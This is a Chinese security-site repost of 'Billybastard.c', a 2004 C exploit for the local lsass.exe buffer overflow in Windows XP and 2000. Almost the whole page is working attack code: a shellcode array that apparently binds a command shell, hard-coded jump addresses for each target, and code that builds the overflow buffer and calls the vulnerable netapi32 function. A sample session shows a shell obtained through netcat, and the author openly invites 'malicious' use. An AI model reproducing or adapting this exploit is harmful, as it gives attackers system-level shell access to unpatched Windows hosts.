首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft windows lsass.exe local exploit
来源:vfocus.net 作者:Assassin 发布时间:2004-04-26  

/*

Billybastard.c !!!!

The following code is functional code to exploit the lsass.exe flaw
discovered by eeye. This is the local version of the exploit. I will
release a remote version if someone pays me;) Use at your free will,
to test for the vulnerability or for malicious means. I do not give a
fuck.

Greetz: Dayle, Sc, breezah, RaFa, netmaniac, nightforce, prog, illmob group
and everyone else i forgot to mention.

Big thanks to netmaniac for hints on the undocumented api and making me
aware of the bug etc.

Obstacles encountered during developing the code:

The biggest problem was probably the fact that the area pointed to
by ESP was actually a very limited place where we had control of
(8 bytes to be precised). There is no way decent shellcode would
fit into it. So what i done was relocated my shellcode somewhere
else in the buffer and performed a bit of hackery to jump backwards
into the place where the shellcode was located. I also had to make
sure the registers were kept intact and cleaned up but this was not
a problem.

--------------

C:\Documents and Settings\ronan>nc 127.0.0.1 31337

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

----------------

Coded by Hi_Tech_Assassin

date: 15/4/04

*/

#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>

#pragma comment(lib,"rpcrt4.lib")

#define NET_LIB "netapi32.dll"
#define NET_LIB_FUNC "DsRoleUpgradeDownlevelServer"

#define BUFSIZE 2000
#define NOP 0x90

struct targets
{
int targetNo;
char platform[40];
long jmpAddr;

} target[]=
{
{1,"win xp(sp1 all patches) kernel32.dll", 0x77E9AE59}, // tested
{2,"win2k(all)", 0x0018759F}, // untested
{3,"crash", 0xffffffff},
{NULL}
};

char shellcode[] =

"\x90"
"\x8B\xEC" //mov ebp, esp
"\xB0\x90" //mov al, 90h
"\x2B\xE0" //sub esp, eax
"\x90\x90\x90"

"\xeb\x23\x7a\x69\x02\x05\x6c\x59\xf8\x1d\x9c\xde\x8c\xd1\x4c"
"\x70\xd4\x03\xf0\x27\x20\x20\x30\x08\x57\x53\x32\x5f\x33\x32"
"\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d\x83\xed"
"\x2a\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b"
"\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01\xfb\x8b"
"\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b\x5b\x20"
"\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe\xac\x31"
"\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x05\x8d\x44\x45\x04"
"\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50\x52\x2b"
"\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f\xb6\x4d"
"\x05\x89\x44\x8d\xd8\xfe\x4d\x05\x75\xbe\xfe\x4d\x04\x74\x21"
"\xfe\x4d\x22\x8d\x5d\x18\x53\xff\xd0\x89\xc7\x6a\x04\x58\x88"
"\x45\x05\x80\x45\x77\x0a\x8d\x5d\x74\x80\x6b\x26\x14\xe9\x78"
"\xff\xff\xff\x89\xce\x31\xdb\x53\x53\x53\x53\x56\x46\x56\xff"
"\xd0\x97\x55\x58\x66\x89\x30\x6a\x10\x55\x57\xff\x55\xd4\x4e"
"\x56\x57\xff\x55\xcc\x53\x55\x57\xff\x55\xd0\x97\x8d\x45\x88"
"\x50\xff\x55\xe4\x55\x55\xff\x55\xe8\x8d\x44\x05\x0c\x94\x53"
"\x68\x2e\x65\x78\x65\x68\x5c\x63\x6d\x64\x94\x31\xd2\x8d\x45"
"\xcc\x94\x57\x57\x57\x53\x53\xfe\xc6\x01\xf2\x52\x94\x8d\x45"
"\x78\x50\x8d\x45\x88\x50\xb1\x08\x53\x53\x6a\x10\xfe\xce\x52"
"\x53\x53\x53\x55\xff\x55\xec\x6a\xff\xff\x55\xe0";

void Banner(void)
{
puts("\nBillybastard (local lsass ownage exploit)");
}

void Usage(void)
{
int x=0;

printf("\nUsage:\n\n Billybastard <target no>\n\nTargets\n\n");
while(target[x].targetNo)
{
printf("[%d] - %s\n", target[x].targetNo, target[x].platform);
x++;
}
printf("\nCoded by: Hi Tech Assassin\n");
}

int main(int argc, char **argv)
{
HMODULE hNetLib;
FARPROC NetLibFunc;

char junk[]="\xee\xee\xee";

char strAsmSex[]="\x66\x81\xEC\x1C\x07\xFF\xE4";

char strBigBuffer[BUFSIZE];
unsigned int targetNo=0;

unsigned char * pszUuid = NULL;
unsigned char * pszProtocolSequence = "ncacn_np";
unsigned char * pszNetworkAddress = NULL;
unsigned char * pszEndpoint = "\\pipe\\lsarpc";
unsigned char * pszOptions = NULL;
unsigned char * pszStringBinding = NULL;
unsigned char * pszString = NULL;

RPC_STATUS rpcStatus;

Banner();

if(argc==2)targetNo=atoi(argv[1])-1;

else
{
Usage();
return 0;
}

rpcStatus=RpcStringBindingCompose(pszUuid,
pszProtocolSequence,
pszNetworkAddress,
pszEndpoint,
pszOptions,
&pszStringBinding);
if(rpcStatus)
{
printf("rpcbind error\n");
return 1;
}

printf("rpcbind success!\n");

hNetLib = LoadLibrary(NET_LIB);

if(hNetLib == NULL)
{
printf("[x] Error loadin' library %s\n Exitin'...\n",NET_LIB);
return 1;
}

NetLibFunc = (HANDLE)GetProcAddress(hNetLib,NET_LIB_FUNC);

memset(strBigBuffer, NOP, BUFSIZE);

memcpy(strBigBuffer+160, shellcode, strlen(shellcode));
memcpy(strBigBuffer+1980, strAsmSex, strlen(strAsmSex));

*(long *)&strBigBuffer[1964]=target[targetNo].jmpAddr;

NetLibFunc(strBigBuffer,junk,junk,junk,junk,junk,junk,junk,junk,junk,junk,junk);

RpcStringFree(&pszStringBinding);
FreeLibrary(hNetLib);

return 0;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Windows schannel.dll PCT1 协议
·TCP Connection Reset Remote Wi
·Windows Lsasrv.dll RPC Remote
·UMOD arbitrary file overwritin
·Windows LDT PoC Exploit by msl
·TCP vulnerability proof of con
·Microsoft IIS 5.0 SSL Remote E
·TCP Reset Tool v1.2
·SquirrelMail chpasswd local Ro
·BGP denial of service exploit
·Multiple Cisco Exploit Codes
·Microsoft IIS 5.x SSL PCT Remo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved